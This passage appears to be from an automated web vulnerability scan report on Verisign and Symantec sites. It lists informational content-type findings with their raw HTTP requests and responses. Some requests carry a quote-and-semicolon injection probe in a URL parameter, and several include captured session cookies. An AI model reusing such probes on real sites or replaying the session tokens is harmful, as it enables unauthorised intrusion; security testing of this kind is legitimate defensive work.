HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:46 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT Accept-Ranges: bytes Content-Length: 3231 Expires: Sun, 09 Oct 2011 21:59:46 GMTContent-Type: image/jpeg GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{....[SNIP]...
23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.custom.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-AliveContent-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://www.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-AliveContent-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
24. Content type is not specified
previous
There are 19 instances of this issue:
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
24.1. https://fileconnect.symantec.com/javascript/calendar2.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/calendar2.js
Request
GET /javascript/calendar2.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 6722 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes // Title: Tigra Calendar // Description: See the demo at url // URL: http://www.softcomplex.com/products/tigra_calendar/ // Version: 3.1 (American date format) // Date: 08-08-2002 (mm-dd-yyyy) //...[SNIP]...
24.2. https://fileconnect.symantec.com/javascript/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/s_code.js
Request
GET /javascript/s_code.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 15081 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.14. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here */ //s_account="devsymantec...[SNIP]...
24.3. https://fileconnect.symantec.com/javascript/validations.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/validations.js
Request
GET /javascript/validations.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 10399 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes var dtCh= "/"; function trim(strText) { // this will get rid of leading spaces while (strText.substring(0,1) == ' ') strText = strText.substring(1, strText.length); // th...[SNIP]...
24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://forms.verisign.com
Path:
/websurveys/servlet/ActionMultiplexer
Request
GET /websurveys/servlet/ActionMultiplexer HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 36 Date: Fri, 09 Sep 2011 21:41:07 GMT Missing or unknown action ID: null
24.5. http://l.player.ooyala.com/verify
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://l.player.ooyala.com
Path:
/verify
Request
POST /verify?ts=1315621578937 HTTP/1.1 Host: l.player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf Content-Length: 1 Origin: http://www.verisign.ch x-verify: AwABAgwAFQsAAgAAAAJDQQsAAwAAAApTQU5UQUNMQVJBCwAEAAAAB1NBTkpPU0UIAAYABbJoCAAH/+1mhgsACAAAAA01MC4yMy4xMjMuMTA2BgAJAycGAAoc6AMACwELAAwAAAALK3pOMGFhRzZhV3YACAAITmrKyQYACQEsCwAEAAAAD0JzOFQ3a3ZMUnR0a3lBSQsABQAAAAJVUwsABgAAADVodHRwOi8vd3d3LnZlcmlzaWduLmNoL3RydXN0LXNlYWwvaW5kZXguaHRtbD90aWQ9Z25wcwgAB05qguIPAAoLAAAAAwAAABx3MWMyVTZmcVZucWFmck1oaUFMYXdZaTlVVWNrAAAAIHcwTm1KaE1UcUFWQmlrMi1tdk1BbHc3bEJPTExyTnBHAAAAAW8PABQMAAAAAwMAAQUAAwABAgMAAgAAAwABAQAPAAwIAAAAAwAAADwAAAA8AAAAAAsADQAAABl2LVdJTl8xMC4zLjE4My43IXItZiFjLTU1DwALDAAAAA4DAAEAAwACEwgABgAAAAAAAwABAgMAAhMIAAZOaWLPAAMAAQEDAAIBCAAGAAAAAAIAEQECABIBAAMAAQADAAIBCAAGAAAAAAIAEQECABIBAAMAAQIDAAIBCAAGTmlizwIAEQECABIBAA8ACwMAAAADAQACAwACGQwAGgsAAQAAAB5pcC0xMC0xMjYtMjE1LTg0XzEzMTU2MDM1NDhfODcLAAIAAAAgdzBObUpoTVRxQVZCaWsyLW12TUFsdzdsQk9MTHJOcEcIAAMAAAAABAAEQAnxqfvnbIsEAAVAdbAAAAAAAAQABkB1sAAAAAAACwAIAAAAAAAADwALAwAAAAMBAAIDAAIKDAAFCAACAAAAAA0ACwMIAAAAAQMABKHpCwAPAAAAEXBsYXllci5vb3lhbGEuY29tAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAARDQALAwgAAAACBAAEqlMFAAACzAgABQAAAccGAA0ABgYADgEcAAADAAECAwACEgwAEAYAAQABDwACCAAAAAEAAAYXAAIAHAAAAwABAgMAAhIMABAGAAEAAg8AAggAAAABAAAHBQACABwAAA8ACwMAAAADAgABAwACEgwADggABQAAKPAADAAQBgABAB4PAAIIAAAAAQAABwsAAgAcAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAANDQALAwgAAAACBAAAAR0CAADpcQgABQAAA44GAA0AAwYADgHUAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAA8DQALAwgAAAABBAAABE8IAAUAAAGABgANAAEGAA4BgAAAAwABAgMAAhIMABAGAAEAAw8AAggAAAABAAAIDwACABwAAAMAEQADABIBAwAPAQA=&sig=0WnlcCNiv6U713lWFHQF User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 content-type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819 r
Response
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Fri, 09 Sep 2011 21:26:11 GMT Content-Length: 2 Connection: close Expires: Fri, 09 Sep 2011 21:26:10 GMT Cache-Control: no-cache OK
24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/InstantInvite3.js
Request
GET /renewals/js/InstantInvite3.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 34318 Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT Accept-Ranges: bytes /* Copyright (C) InstantService, Inc. All rights reserved. * All content is protected under U.S. copyright laws. Any unauthorized duplication, modification, * or reverse-engineering of this code with...[SNIP]...
24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/commonFunctions.js
Request
GET /renewals/js/commonFunctions.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 5510 Last-Modified: Thu, 18 Mar 2010 01:42:34 GMT Accept-Ranges: bytes // $Id: commonFunctions.js 82 2008-01-30 00:07:20Z mhallesy $ /////////////////////////////////////////// //commonFunctions.js //maintained by stuller //last updated 1/18/2006 //see Confluence fo...[SNIP]...
24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/commonValidation2-9-06.js
Request
GET /renewals/js/commonValidation2-9-06.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 32366 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes // $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $ //please do not make changes to this file! //if you need to modify it, please make a copy, since this script is used by multipl...[SNIP]...
24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/dhtmlwindow.js
Request
GET /renewals/js/dhtmlwindow.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:34 GMT Content-Length: 19028 Last-Modified: Wed, 02 Jun 2010 23:07:30 GMT Accept-Ranges: bytes // ------------------------------------------------------------------- // DHTML Window Widget- By Dynamic Drive, available at: http://www.dynamicdrive.com // v1.0: Script created Feb 15th, 07' // v...[SNIP]...
24.10. https://renewals.symantec.com/renewals/js/getPageNames.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/getPageNames.js
Request
GET /renewals/js/getPageNames.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 3087 Last-Modified: Wed, 12 May 2010 17:24:52 GMT Accept-Ranges: bytes // $Id: getPageNames.js 1694 2009-04-09 01:56:00Z mhallesy $ function pageNamesLookup(chanName) { this.stSrch = "/renewals/"; this.nameLookup = new Array(); this.nameLookup["chat_form.jsp"]...[SNIP]...
24.11. https://renewals.symantec.com/renewals/js/modal.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/modal.js
Request
GET /renewals/js/modal.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:35 GMT Content-Length: 3362 Last-Modified: Thu, 20 May 2010 22:54:24 GMT Accept-Ranges: bytes // ------------------------------------------------------------------- // DHTML Modal window- By Dynamic Drive, available at: http://www.dynamicdrive.com // v1.0: Script created Feb 27th, 07' // v1...[SNIP]...
24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/mySymantecDevKit.js
Request
GET /renewals/js/mySymantecDevKit.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 10076 Last-Modified: Mon, 13 Sep 2010 21:57:06 GMT Accept-Ranges: bytes function showHelp(thisitem){var divname="help"+thisitem;var thediv=document.getElementById(divname);thediv.style.visibility='visible';} function hideHelp(thisitem){var divname="help"+thisitem;var the...[SNIP]...
24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/s_2_code_symc_cust_prod.js
Request
